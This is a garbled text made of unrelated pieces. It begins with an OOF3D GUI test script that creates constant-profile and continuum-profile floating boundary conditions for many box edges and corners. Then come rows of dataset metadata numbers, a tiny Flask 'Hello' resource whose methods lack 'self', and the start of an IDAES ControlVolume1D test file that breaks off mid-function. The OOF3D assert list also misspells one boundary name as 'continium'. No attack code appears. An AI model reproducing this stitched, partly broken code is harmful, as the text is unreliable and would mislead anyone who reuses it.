checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminZmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'YmaxZmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantYmaxZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumYmaxZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'YmaxZmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantYmaxZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumYmaxZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'YminZmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantYminZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumYminZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'YminZmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantYminZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumYminZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxYmaxZmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxYmaxZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxYmaxZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxYmaxZmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxYmaxZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxYmaxZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxYminZmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxYminZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxYminZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxYminZmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxYminZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxYminZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminYmaxZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminYmaxZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminYmaxZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminYmaxZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminYmaxZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminYmaxZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminYminZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminYminZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminYminZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminYminZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminYminZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminYminZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
assert tests.boundaryConditionCheck(['floating_constantXmax', 'floating_constantXmaxYmax', 'floating_constantXmaxYmaxZmax', 'floating_constantXmaxYmaxZmin', 'floating_constantXmaxYmin', 'floating_constantXmaxYminZmax', 'floating_constantXmaxYminZmin', 'floating_constantXmaxZmax', 'floating_constantXmaxZmin', 'floating_constantXmin', 'floating_constantXminYmax', 'floating_constantXminYmaxZmax', 'floating_constantXminYmaxZmin', 'floating_constantXminYmin', 'floating_constantXminYminZmax', 'floating_constantXminYminZmin', 'floating_constantXminZmax', 'floating_constantXminZmin', 'floating_constantYmax', 'floating_constantYmaxZmax', 'floating_constantYmaxZmin', 'floating_constantYmin', 'floating_constantYminZmax', 'floating_constantYminZmin', 'floating_constantZmax', 'floating_constantZmin', 'floating_continiumXmax', 'floating_continuumXmaxYmax', 'floating_continuumXmaxYmaxZmax', 'floating_continuumXmaxYmaxZmin', 'floating_continuumXmaxYmin', 'floating_continuumXmaxYminZmax', 'floating_continuumXmaxYminZmin', 'floating_continuumXmaxZmax', 'floating_continuumXmaxZmin', 'floating_continuumXmin', 'floating_continuumXminYmax', 'floating_continuumXminYmaxZmax', 'floating_continuumXminYmaxZmin', 'floating_continuumXminYmin', 'floating_continuumXminYminZmax', 'floating_continuumXminYminZmin', 'floating_continuumXminZmax', 'floating_continuumXminZmin', 'floating_continuumYmax', 'floating_continuumYmaxZmax', 'floating_continuumYmaxZmin', 'floating_continuumYmin', 'floating_continuumYminZmax', 'floating_continuumYminZmin', 'floating_continuumZmax', 'floating_continuumZmin'])
findMenu(findWidget('OOF3D:MenuBar'), 'File:Save:Python_Log').activate()
checkpoint toplevel widget mapped Dialog-Python_Log
findWidget('Dialog-Python_Log').resize(190, 92)
findWidget('Dialog-Python_Log:filename').set_text('bcpage.log')
findWidget('Dialog-Python_Log:gtk-ok').clicked()
checkpoint OOF.File.Save.Python_Log
assert tests.filediff('bcpage.log')
widget_2=findWidget('OOF3D')
handled_2=widget_2.event(event(gtk.gdk.DELETE,window=widget_2.window))
postpone if not handled_2: widget_2.destroy()
checkpoint OOF.Graphics_1.File.Close
| 51.592334
| 1,587
| 0.842591
| 7,146
| 59,228
| 6.950742
| 0.035264
| 0.168311
| 0.186028
| 0.163841
| 0.925287
| 0.917073
| 0.910026
| 0.906624
| 0.903684
| 0.899779
| 0
| 0.018899
| 0.079844
| 59,228
| 1,147
| 1,588
| 51.637315
| 0.892493
| 0.00883
| 0
| 0.884378
| 0
| 0
| 0.318942
| 0.105701
| 0
| 0
| 0
| 0
| 0.00353
| 0
| null | null | 0
| 0.000883
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
6009f744708202d32c62af83a116f57632df0a81
| 178
|
py
|
Python
|
resources/Hello.py
|
ruanpato/flaskRestfulAPI
|
1c9611a00ccdfcb519e3378a112c28d3e4f8dcce
|
[
"MIT"
] | null | null | null |
resources/Hello.py
|
ruanpato/flaskRestfulAPI
|
1c9611a00ccdfcb519e3378a112c28d3e4f8dcce
|
[
"MIT"
] | 2
|
2020-01-28T13:23:58.000Z
|
2020-01-28T13:26:04.000Z
|
resources/Hello.py
|
ruanpato/flaskRestfulAPI
|
1c9611a00ccdfcb519e3378a112c28d3e4f8dcce
|
[
"MIT"
] | 2
|
2020-01-28T13:23:25.000Z
|
2020-01-28T14:32:22.000Z
|
from flask_restful import Resource
class Hello(Resource):
def get():
return {"message": "Hello, World!"}
def post():
return {"message": "Hello, World!"}
| 22.25
| 43
| 0.606742
| 20
| 178
| 5.35
| 0.65
| 0.242991
| 0.336449
| 0.429907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.241573
| 178
| 8
| 44
| 22.25
| 0.792593
| 0
| 0
| 0.333333
| 0
| 0
| 0.223464
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.166667
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
60210011a8666b59f5803940b9ea510ff7afa5e7
| 120,171
|
py
|
Python
|
idaes/core/tests/test_control_volume_1d.py
|
dangunter/idaes-pse
|
8f63b4ad8000af8a3eb0316a5f61c32e206925d0
|
[
"RSA-MD"
] | null | null | null |
idaes/core/tests/test_control_volume_1d.py
|
dangunter/idaes-pse
|
8f63b4ad8000af8a3eb0316a5f61c32e206925d0
|
[
"RSA-MD"
] | null | null | null |
idaes/core/tests/test_control_volume_1d.py
|
dangunter/idaes-pse
|
8f63b4ad8000af8a3eb0316a5f61c32e206925d0
|
[
"RSA-MD"
] | null | null | null |
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
Tests for ControlVolumeBlockData.
Author: Andrew Lee
"""
import pytest
from pyomo.environ import (ConcreteModel, Constraint, Expression,
Set, units, Var)
from pyomo.util.check_units import assert_units_consistent
from pyomo.dae import ContinuousSet, DerivativeVar
from pyomo.common.config import ConfigBlock
from pyomo.core.base.constraint import _GeneralConstraintData
from idaes.core import (ControlVolume1DBlock,
FlowsheetBlockData,
declare_process_block_class,
FlowDirection,
MaterialBalanceType,
EnergyBalanceType)
from idaes.core.control_volume1d import ControlVolume1DBlockData
from idaes.core.util.exceptions import (BalanceTypeNotSupportedError,
ConfigurationError,
PropertyNotSupportedError)
from idaes.core.control_volume1d import DistributedVars
from idaes.core.util.testing import (PhysicalParameterTestBlock,
ReactionParameterTestBlock)
import idaes.logger as idaeslog
# -----------------------------------------------------------------------------
# Mockup classes for testing
@declare_process_block_class("Flowsheet")
class _Flowsheet(FlowsheetBlockData):
def build(self):
super(_Flowsheet, self).build()
@declare_process_block_class("CVFrame")
class CVFrameData(ControlVolume1DBlockData):
def build(self):
super(ControlVolume1DBlockData, self).build()
# -----------------------------------------------------------------------------
# Test DistributedVars Enum
@pytest.mark.unit
def test_DistributedVars():
assert len(DistributedVars) == 2
# -----------------------------------------------------------------------------
# Basic tests
@pytest.mark.unit
def test_base_build():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = CVFrame(default={"property_package": m.fs.pp})
assert len(m.fs.cv.config) == 12
assert m.fs.cv.config.dynamic is False
assert m.fs.cv.config.has_holdup is False
assert m.fs.cv.config.property_package == m.fs.pp
assert isinstance(m.fs.cv.config.property_package_args, ConfigBlock)
assert len(m.fs.cv.config.property_package_args) == 0
assert m.fs.cv.config.reaction_package is None
assert isinstance(m.fs.cv.config.reaction_package_args, ConfigBlock)
assert len(m.fs.cv.config.reaction_package_args) == 0
assert m.fs.cv.config.auto_construct is False
assert m.fs.cv.config.area_definition == DistributedVars.uniform
assert m.fs.cv.config.transformation_method is None
assert m.fs.cv.config.transformation_scheme is None
assert m.fs.cv.config.finite_elements is None
assert m.fs.cv.config.collocation_points is None
@pytest.mark.unit
def test_validate_config_args_transformation_method_none():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
with pytest.raises(ConfigurationError):
m.fs.cv = ControlVolume1DBlock(default={"property_package": m.fs.pp})
@pytest.mark.unit
def test_validate_config_args_transformation_scheme_none():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
with pytest.raises(ConfigurationError):
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference"})
@pytest.mark.unit
def test_validate_config_args_transformation_scheme_invalid_1():
m = ConcreteModel()
